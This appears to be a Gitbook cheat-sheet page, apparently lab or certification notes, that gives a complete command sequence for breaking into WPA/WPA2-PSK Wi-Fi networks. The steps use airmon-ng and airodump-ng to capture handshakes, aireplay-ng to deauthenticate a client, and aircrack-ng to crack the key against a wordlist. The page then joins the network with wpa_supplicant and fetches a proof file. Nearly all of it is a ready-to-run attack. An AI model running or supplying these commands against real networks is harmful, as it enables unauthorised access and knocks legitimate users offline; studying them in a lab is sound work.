All Gitbook

WPA-PSK

WPA/WPA2

Setup

sudo airmon-ng check kill

sudo airmon-ng start wlan0

Reconnaissance

sudo airodump-ng wlan0mon

Gather CH ESSID BSSID & Clients ; AUTH PSK= WPA Personal

Capture + output as wpa-01.pcap

# -c channel -w output filename = recon-0#
sudo airodump-ng -c # --essid AP_NAME --bssid XX:XX:XX:XX:XX:XX -w wpa --output-format pcap wlan0mon

Deauth a client once to get reconnection for handshakes

#-a AP MAC -c Client MAC
sudo aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0mon

Cracking

aircrack-ng

#-b bssid -e essid
aircrack-ng -w /usr/share/john/password.lst -e AP_NAME -b XX:XX:XX:XX:XX:XX wpa-01.cap

Connect to the network with retrieved credentials

Create wpa_supplicant.conf 

network={
  ssid="network"
  scan_ssid=1
  psk="password"
  key_mgmt=WPA-PSK
}

Connect to network

wpa_supplicant -c <config file>

sudo dhclient wlan0

Get proof

curl http://192.168.1.1/proof.txt
PreviousWPA-MGTNextWEP (Copied from "References")

Last updated